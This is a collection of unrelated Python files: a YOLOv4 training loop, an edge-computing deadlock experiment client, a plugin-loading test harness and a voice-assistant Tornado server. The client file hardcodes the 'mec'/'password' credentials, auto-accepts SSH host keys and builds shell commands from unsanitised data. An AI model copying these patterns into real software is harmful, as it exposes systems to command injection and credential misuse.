'loss_cls': loss_cls.item(),
'loss_l2': loss_l2.item(),
'lr': scheduler.get_lr()[0] * config.batch
})
logging.info('Train step_{}: loss : {},loss xy : {},loss wh : {},'
'loss obj : {},loss cls : {},loss l2 : {},lr : {}'
.format(global_step, loss.item(), loss_xy.item(),
loss_wh.item(), loss_obj.item(),
loss_cls.item(), loss_l2.item(),
scheduler.get_lr()[0] * config.batch))
pbar.update(images.shape[0])
# Use a barrier() to make sure that process 1 loads the model after process
# 0 saves it.
#dist.barrier()
if rank == 0:
logging.info(f'epoch loss : {epoch_loss/epoch_step},')
if config.use_darknet_cfg:
eval_model = Darknet(config.cfgfile, inference=True)
else:
eval_model = Yolov4(config.pretrained, n_classes=config.classes, inference=True)
eval_model.load_state_dict(model.module.state_dict())
eval_model.to(device)
evaluator = evaluate(eval_model, val_loader, config, device)
del eval_model
stats = evaluator.coco_eval['bbox'].stats
writer.add_scalar('train/AP', stats[0], global_step)
writer.add_scalar('train/AP50', stats[1], global_step)
writer.add_scalar('train/AP75', stats[2], global_step)
writer.add_scalar('train/AP_small', stats[3], global_step)
writer.add_scalar('train/AP_medium', stats[4], global_step)
writer.add_scalar('train/AP_large', stats[5], global_step)
writer.add_scalar('train/AR1', stats[6], global_step)
writer.add_scalar('train/AR10', stats[7], global_step)
writer.add_scalar('train/AR100', stats[8], global_step)
writer.add_scalar('train/AR_small', stats[9], global_step)
writer.add_scalar('train/AR_medium', stats[10], global_step)
writer.add_scalar('train/AR_large', stats[11], global_step)
if save_cp and rank == 0:
try:
# os.mkdir(config.checkpoints)
os.makedirs(config.checkpoints, exist_ok=True)
logging.info('Created checkpoint directory')
except OSError:
pass
save_path = os.path.join(config.checkpoints, f'{save_prefix}{epoch + 1}.pth')
#torch.save(model.moduel, state_dict(), save_path)
torch.save(model.state_dict(), save_path)
logging.info(f'Checkpoint {epoch + 1} saved !')
saved_models.append(save_path)
if len(saved_models) > config.keep_checkpoint_max > 0:
model_to_remove = saved_models.popleft()
try:
os.remove(model_to_remove)
except:
logging.info(f'failed to remove {model_to_remove}')
if rank == 0:
writer.close()
logging.info(f'Train exit!')
@torch.no_grad()
def evaluate(model, data_loader, cfg, device, logger=None, **kwargs):
""" finished, tested
"""
# cpu_device = torch.device("cpu")
model.eval()
# header = 'Test:'
coco = convert_to_coco_api(data_loader.dataset, bbox_fmt='coco')
coco_evaluator = CocoEvaluator(coco, iou_types = ["bbox"], bbox_fmt='coco')
for images, targets in data_loader:
model_input = [[cv2.resize(img, (cfg.w, cfg.h))] for img in images]
model_input = np.concatenate(model_input, axis=0)
model_input = model_input.transpose(0, 3, 1, 2)
model_input = torch.from_numpy(model_input).div(255.0)
model_input = model_input.to(device)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
if torch.cuda.is_available():
torch.cuda.synchronize()
model_time = time.time()
outputs = model(model_input)
# outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]
model_time = time.time() - model_time
# outputs = outputs.cpu().detach().numpy()
res = {}
# for img, target, output in zip(images, targets, outputs):
for img, target, boxes, confs in zip(images, targets, outputs[0], outputs[1]):
img_height, img_width = img.shape[:2]
# boxes = output[...,:4].copy() # output boxes in yolo format
boxes = boxes.squeeze(2).cpu().detach().numpy()
boxes[...,2:] = boxes[...,2:] - boxes[...,:2] # Transform [x1, y1, x2, y2] to [x1, y1, w, h]
boxes[...,0] = boxes[...,0]*img_width
boxes[...,1] = boxes[...,1]*img_height
boxes[...,2] = boxes[...,2]*img_width
boxes[...,3] = boxes[...,3]*img_height
boxes = torch.as_tensor(boxes, dtype=torch.float32)
# confs = output[...,4:].copy()
confs = confs.cpu().detach().numpy()
labels = np.argmax(confs, axis=1).flatten()
labels = torch.as_tensor(labels, dtype=torch.int64)
scores = np.max(confs, axis=1).flatten()
scores = torch.as_tensor(scores, dtype=torch.float32)
res[target["image_id"].item()] = {
"boxes": boxes,
"scores": scores,
"labels": labels,
}
evaluator_time = time.time()
coco_evaluator.update(res)
evaluator_time = time.time() - evaluator_time
# gather the stats from all processes
coco_evaluator.synchronize_between_processes()
# accumulate predictions from all images
coco_evaluator.accumulate()
coco_evaluator.summarize()
return coco_evaluator
def get_args(**kwargs):
cfg = kwargs
parser = argparse.ArgumentParser(description='Train the Model on images and target masks',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument('-b', '--batch-size', metavar='B', type=int, nargs='?', default=2,
# help='Batch size', dest='batchsize')
parser.add_argument('-l', '--learning_rate', metavar='LR', type=float, nargs='?', default=0.001,
help='Learning rate', dest='learning_rate')
parser.add_argument('-f', '--load', dest='load', type=str, default=None,
help='Load model from a .pth file')
parser.add_argument('-g', '--gpu', metavar='G', type=int, default=os.environ['SM_NUM_GPUS'],
help='GPU', dest='gpu')
parser.add_argument('-d', '--data_dir', type=str, default='/opt/ml/input/data/data_dir/',
help='dataset dir', dest='dataset_dir')
parser.add_argument('-p', '--pretrained',type=str, default='/opt/ml/input/data/pretrained/yolov4.conv.137.pth', help='pretrained yolov4.conv.137')
parser.add_argument('-c', '--classes',type=int, default=3, help='dataset classes')
parser.add_argument('-t', '--train_txt',dest='train_label', type=str, default='/opt/ml/input/data/train_txt/train.txt', help="train label path")
parser.add_argument('-v', '--val_txt',dest='val_label', type=str, default='/opt/ml/input/data/val_txt/val.txt', help="val label path")
parser.add_argument('-e', '--epochs',dest='epochs', type=int, default=1, help="epoch number")
parser.add_argument('-b', '--batch',dest='batch', type=int, default=32, help="batch number")
parser.add_argument('-w', '--workers',dest='workers', type=int, default=2, help="workers number")
parser.add_argument('-s', '--subdivisions',dest='subdivisions', type=int, default=16, help="subdivisions number")
parser.add_argument('-o', '--optimizer',type=str, default='adam',
help='training optimizer',
dest='TRAIN_OPTIMIZER')
parser.add_argument('-i', '--iou_type', type=str, default='iou',
help='iou type (iou, giou, diou, ciou)',
dest='iou_type')
parser.add_argument(
'-keep-checkpoint-max', type=int, default=10,
help='maximum number of checkpoints to keep. If set 0, all checkpoints will be kept',
dest='keep_checkpoint_max')
args = vars(parser.parse_args())
# for k in args.keys():
# cfg[k] = args.get(k)
cfg.update(args)
return edict(cfg)
def init_logger(log_file=None, log_dir=None, log_level=logging.DEBUG, mode='w', stdout=True):
"""
log_dir: 日志文件的文件夹路径
mode: 'a', append; 'w', 覆盖原文件写入.
"""
def get_date_str():
now = datetime.datetime.now()
return now.strftime('%Y-%m-%d_%H-%M-%S')
fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s'
if log_dir is None:
log_dir = '~/temp/log/'
if log_file is None:
log_file = 'log_' + get_date_str() + '.txt'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
log_file = os.path.join(log_dir, log_file)
# 此处不能使用logging输出
print('log file path:' + log_file)
logging.basicConfig(level=logging.DEBUG,format=fmt,filename=log_file,filemode=mode)
#logging.basicConfig(level=logging.DEBUG,format=fmt)
if stdout:
console = logging.StreamHandler(stream=sys.stdout)
console.setLevel(log_level)
formatter = logging.Formatter(fmt)
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
return logging
def _get_date_str():
now = datetime.datetime.now()
return now.strftime('%Y-%m-%d_%H-%M')
log_dir = os.environ['SM_OUTPUT_DATA_DIR']
logging = init_logger(log_dir=log_dir)
if __name__ == "__main__":
cfg = get_args(**Cfg)
world_size = len(json.loads(os.environ['SM_HOSTS'])) * cfg.gpu
#processes = []
try:
if world_size > 1:
mp.spawn(train, nprocs=cfg.gpu, args=(cfg,), join=True, daemon=False)
else:
train(0, cfg)
'''
for local_rank in range(cfg.gpu):
p = mp.Process(target=train, args=(local_rank, cfg))
p.start()
processes.append(p)
for p in processes:
p.join()
'''
except Exception as e:
print(e)
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
1gui_user.py
|
#!/usr/bin/env python3
import matplotlib
matplotlib.use('TkAgg')
import socket
import os
import ast
import struct
from threading import Thread
import random as r
import time
import datetime as dt
import subprocess as sp
import paho.mqtt.client as mqtt
import matplotlib.pyplot as plt
from drawnow import *
import smtplib
import config
import paramiko
import data_file as dst
port = 65000 # The port used by the server
# hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
record = [] # [({tasks}, {waiting time}), hostname] records the task list and execution and waiting time and host sent
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multi-cast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
'''
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
'''
thread_record = []
task_record = {} # records tasks start time and finish time {seq_no:{task:[duration, start_time,finish_time]}}
# idea for task naming # client-id_task-no_task-id client id = 11, task no=> sequence no, task id => t1
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local':0, 'mec':0, 'cloud':0}
untimely_ = {'local':0, 'mec':0, 'cloud':0}
filename = {2: 'rms+bankers',
3: 'edf+bankers',
7: 'rms+wound_wait',
10: 'rms+wait_die',
12: 'edf+wound_wait',
16: 'edf+wait_die'}
plt.ion()
fig = plt.figure(frameon=True)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(223)
ax3 = fig.add_subplot(224)
def auto_value(no):
if no < 5:
return no
elif no < 10:
return no - 3
elif no < 50:
return no - 6
elif no < 150:
return no - 30
elif no < 800:
return no - 70
elif no < 2000:
return no - 200
else:
return no - 400
def plot_performance():
name = ['Timely', 'Untimely']
ypos = ([0, 1])
total = tasks_executed_on_time + tasks_not_executed_on_time
if tasks_executed_on_time > 0:
timely = round((tasks_executed_on_time / total) * 100, 2)
else:
timely = 0
if tasks_not_executed_on_time > 0:
untimely = round((tasks_not_executed_on_time / total) * 100, 2)
else:
untimely = 0
values = [tasks_executed_on_time, tasks_not_executed_on_time]
ax1.set_xticks(ypos)
ax1.set_xticklabels(name)
ax1.bar(ypos, values, align='center', color=['g', 'm'], alpha=0.5)
ax1.set_title('Task execution Time record')
dis = 'Seq: {}\nTotal Tasks: {}\ntotal: {}'.format(seq, total, total_split_task)
# ax1.annotate(dis, xy=(2, 1), xytext=(3, 1.5))
ax1.text(1, auto_value(tasks_executed_on_time), dis, size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.7, 0.7), fc=(1., 0.8, 0.8), ))
ax1.text(-0.1, tasks_executed_on_time, '{}, {}%'.format(tasks_executed_on_time, timely), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
ax1.text(0.99, tasks_not_executed_on_time, '{}, {}%'.format(tasks_not_executed_on_time, untimely),
size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
plt.subplot(ax1)
d = [[timely_, ax2, 'Timely Details'], [untimely_, ax3, 'UnTimely Details']]
for info in d:
plot_details(ax=info[1], data=info[0], title=info[2])
fig.suptitle('MEC Performance During Deadlock Experiment')
def plot_details(ax, data, title):
name = ['Local', 'MEC', 'Cloud']
ypos = ([0, 1, 2])
data_per = {}
total = 0
for i in data:
total += data[i]
for i in data:
if data[i] == 0:
data_per[i] = 0
else:
data_per[i] = round((data[i] / total) * 100, 2)
values = list(data.values())
ax.set_xticks(ypos)
ax.set_xticklabels(name)
ax.bar(ypos, values, align='center', color=['g', 'b', 'r'], alpha=0.5)
ax.set_title(title)
g = -0.1
for i in data:
ax.text(g, data[i], '{}, {}%'.format(data[i], data_per[i]), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
g += 1
plt.subplot(ax)
def get_time():
_time_ = dt.datetime.utcnow()
return _time_
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
# Callback Function on Connection with MQTT Server
def on_connect(connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(topic, qos=0)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global hosts
global host_dict
global algo_id
global ho
# print the message received from the subscribed topic
details = str(msg.payload, 'utf-8')[2:].split('_')
ho = ast.literal_eval(details[0]) # {hostname: ip}
algo_id = int(details[1])
hosts = sorted(list(ho.values())) # list of Ips
host_dict = dict(zip(list(ho.values()), list(ho.keys()))) # {ip: hostname}
# print('hosts: ', hosts)
_client.loop_stop()
def get_mec_details():
global topic
global _client
global broker_ip
username = 'mec'
password = 'password'
broker_ip = input("Broker's IP: ").strip()
broker_port_no = 1883
topic = 'mec'
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
def on_connect_task(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(task_topic, qos=0)
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
# Callback Function on Receiving the Subscribed Topic/Message
def on_receive_task(message_client, userdata, msg):
global tasks_executed_on_time
global tasks_not_executed_on_time
# print the message received from the subscribed topic
data = str(msg.payload, 'utf-8')
received_task = ast.literal_eval(data) # {task_id: ['2020', '04', '09', '14', '38', '39', '627060', '<mec>']}
for i in received_task:
tk = '.'.join(i.split('.')[:4])
# print('tk: {}'.format(tk))
seq_no = int(tk.split('.')[3]) # naming tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
k = task_record[seq_no][tk] # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
if len(k) < 3: # check if i have received a task with the same id
a = received_task[i]
k.append(dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6])))
p = k[2] - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
elif len(k) == 3:
a = received_task[i]
t = dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6]))
p = t - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds*(10**-6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds*(10**-6))
def receive_mec_start():
global task_topic
global task_client
username = 'mec'
password = 'password'
broker_port_no = 1883
task_topic = client_id(ip_address())
task_client = mqtt.Client()
task_client.on_connect = on_connect_task
task_client.on_message = on_receive_task
task_client.username_pw_set(username, password)
task_client.connect(broker_ip, broker_port_no, 60)
task_client.loop_forever()
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results {} {}'.format(filename[algo_id], get_hostname())
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/client_data.py'.format(data)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def client_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def task_details(tasks):
global task_dist, total_task_sent, total_split_task
total_task_sent += len(tasks)
for task in tasks:
total_split_task += tasks[task]['wcet']
task_dist[tasks[task]['wcet']] += 1
def name_task(task_list, node_id, seq_no):
# naming nomenclature of tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
# returns task list and waiting_time with proper identification
return {i + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[0][i] for i in task_list[0]}, \
{k + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[1][k] for k in task_list[1]}
def namestr(obj):
namespace = globals()
return [name for name in namespace if namespace[name] is obj]
def split_list(data, _id_):
if _id_ == 4: # 866
return data[:866]
if _id_ == 5: # 867
return data[866:1733]
if _id_ == 6: # 867
return data[1733:]
def save_data():
result = f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} " \
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}" \
f"\nrecord{len(hosts)} = {record} \nhost_names{len(hosts)} = {host_dict}" \
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}" \
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = " \
f"{total_split_task} " \
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n" \
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}" \
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}" \
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}" \
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
list_result = [
f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} ",
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}",
f"\nrecord{len(hosts)} = {record} ",
f"\nhost_names{len(hosts)} = {host_dict}",
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}"
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = "
f"{total_split_task} "
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n",
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}",
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}",
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}",
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
file_ = open(f'{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py'
os.system(cmd)
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py",
f"mec@{ho['osboxes-0']}:/home/mec/result/python"])
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py",
f"mec@{ho['osboxes-0']}:/home/mec/result/linux"])
# send_result(ho['osboxes-0'], result)
send_email(result)
def main():
global record
global client_id_
global seq
os.system('clear')
print("================== Welcome to Client Platform ===================")
get_mec_details()
client_id_ = client_id(ip_address())
'''
thread_record.append(Thread(target=receive_tasks))
thread_record[-1].daemon = True
thread_record[-1].start()
'''
redeem_task = Thread(target=receive_mec_start)
redeem_task.daemon = True
redeem_task.start()
while True:
time.sleep(1)
if len(hosts) > 0:
break
print('Client is connected to servers: {}'.format(hosts))
data = {4: dst.mec4, 7: dst.mec7, 10: dst.mec10}
task_bank = {4: dst.data_list4, 5: dst.data_list5, 6: dst.data_list6}
cmd = ['hostname']
host_id = str(sp.check_output(cmd, shell=True), 'utf-8')[-2]
t_list = task_bank[int(host_id)]
while True:
try:
x = input('Enter "y" to start and "stop" to exit: ').strip().lower()
_data_ = split_list(data[len(hosts)], int(host_id))
if x == 'y':
for i in range(len(_data_)):
seq = i
rand_host = hosts[int(_data_[i]) - 1] # host selection using generated gausian distribution
_task_ = t_list[i] # tasks, waiting time
_tasks_list = name_task(_task_, client_id(rand_host), i) # id's tasks => ({tasks}, {waiting time})
task_details(_tasks_list[0])
record.append([_tasks_list, host_dict[rand_host]])
for task in _tasks_list[0]:
sec = dt.timedelta(seconds=_task_[1][task[:2]][1])
if i not in task_record: # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
task_record[i] = {task: [sec, get_time()]}
else:
task_record[i][task] = [sec, get_time()]
# client(_tasks_list, rand_host)
task_client.publish(client_id(rand_host), "t {}".format(_tasks_list))
print("Sent {} to {} node_id {} \n\n".format(_tasks_list, rand_host, client_id(rand_host)))
drawnow(plot_performance)
time.sleep(3)
elif x == 'stop':
print('\nProgramme terminated')
print('MEC: ', ho['osboxes-0'])
save_data()
task_client.loop_stop()
print('done')
time.sleep(1)
break
except KeyboardInterrupt:
print('\nProgramme terminated')
task_client.loop_stop()
break
if __name__ == "__main__":
main()
|
test_decoder.py
|
import os
import threading
import time
import inspect
import sys
import traceback
from avnav_util import AVNUtil
from avnav_api import AVNApi
allData={}
class ApiImpl(AVNApi):
def __init__(self):
self.patterns = None # type: dict
self.prefix=''
def log(self, str, *args):
print("###LOG### %s%s" % (self.prefix,str % args))
def error(self, str, *args):
print("###ERROR# %s%s" % (self.prefix,str % args))
def debug(self, str, *args):
print("###DEBUG# %s%s" % (self.prefix,str % args))
def fetchFromQueue(self, sequence, number=10):
time.sleep(0.5)
return sequence+2,['aha','soso']
def setPattern(self,pattern):
self.patterns=pattern
def addData(self,path,value):
if self.patterns is not None:
matches=False
for p in self.patterns:
if p.get('path') == path:
matches=True
break
if not matches:
print("@@ERROR: invalid path %s"%(path))
return
print("@@DATA@@:%s->%s"%(path,value))
import os, glob, imp
def loadModulesFromDir(dir,logger,prefix=''):
modules = {}
for path in glob.glob(os.path.join(dir, '[!_]*.py')):
name, ext = os.path.splitext(os.path.basename(path))
try:
modules[prefix+name] = imp.load_source(prefix + name, path)
logger.log("loaded %s as %s",path, prefix+name)
except:
logger.error("unable to load %s:%s",path,traceback.format_exc())
return modules
def instantiateHandlersFromModule(modulename,module,allData,logger):
rt=[] #the list of instantiated objects
MANDATORY_METHODS = ['initialize', 'run']
for name in dir(module):
obj=getattr(module,name)
ic=inspect.isclass(obj)
logger.debug("X: %s.%s => %s"%(module,name,ic))
if ic:
logger.debug("C: %s <=> %s"%(obj.__module__,module))
if obj.__module__ != (modulename):
continue
hasMethods=True
for m in MANDATORY_METHODS:
if not hasattr(obj,m):
continue
mObj=getattr(obj,m)
if not callable(mObj):
hasMethods=False
break
if hasMethods:
logger.log("creating %s"%(name))
api = ApiImpl()
api.prefix="(%s): "%name
startDecoder=True
handlerInstance=None
try:
handlerInstance=obj()
d=handlerInstance.initialize(api)
mData=d.get('data')
if mData is None:
raise Exception("no 'data' field in init result")
else:
for entry in mData:
path=entry.get('path')
if path is None:
raise Exception("missing path in entry %s"%(entry))
else:
if allData.get(path) is not None:
raise Exception("entry for %s already defined: %s"%(path,allData.get(path)))
allData[path]=entry
api.setPattern(mData)
except :
logger.error("##ERROR: cannot start %s:%s"%(name,traceback.format_exc()))
startDecoder=False
if startDecoder:
rt.append(handlerInstance)
return rt
PREFIX="avnav_decoder_sys_"
logger=ApiImpl()
modules=loadModulesFromDir(os.path.join(os.path.dirname(__file__),'..','plugins'),logger,PREFIX)
print(modules)
allHandlers=[]
for modulname in modules:
handlers=instantiateHandlersFromModule(modulname,modules[modulname],allData,logger)
allHandlers+=handlers
print("created %d handlers"%len(allHandlers))
for handler in allHandlers:
try:
dt=threading.Thread(target=handler.run)
dt.setDaemon(True)
dt.start()
print("###INFO: started %s"%handler)
except:
print("##ERROR: cannot start %s, errors in run %s"%(handler,traceback.format_exc()))
print("Parameter Listing:")
for p in list(allData.keys()):
print("%s:%s"%(p,allData[p]))
time.sleep(10)
|
server.py
|
import json
from tornado.websocket import WebSocketHandler
from robot import config, utils, logging, constants, Updater, weatherGet
import base64
import requests
import tornado.web
import tornado.ioloop
from tornado import gen
import tornado.httpserver
import tornado.options
import hashlib
import threading
import asyncio
import subprocess
import os
import time
import yaml
import markdown
import random
logger = logging.getLogger(__name__)
conversation, wukong = None, None
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
return self.get_cookie("validation") == config.get('/server/validate', '')
def validate(self, validation):
return validation == config.get('/server/validate', '')
class MainHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch(wukong._dev)
suggestion = random.choice(suggestions)
notices = None
if 'notices' in info:
notices = info['notices']
self.render('index.html', history=conversation.getHistory(), update_info=info, suggestion=suggestion,
notices=notices)
else:
self.render('index.html', history=[])
class MagicHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
self.render('magic.html')
class WeatherHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
self.render('a.html', data=weatherGet.get_weather_data(), week={'(今天)', '(明天)', '(后天)', '', '', ''})
class ChatHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
conversation.doResponse(query=query, UUID=uuid)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory())}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(),
'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'restart':
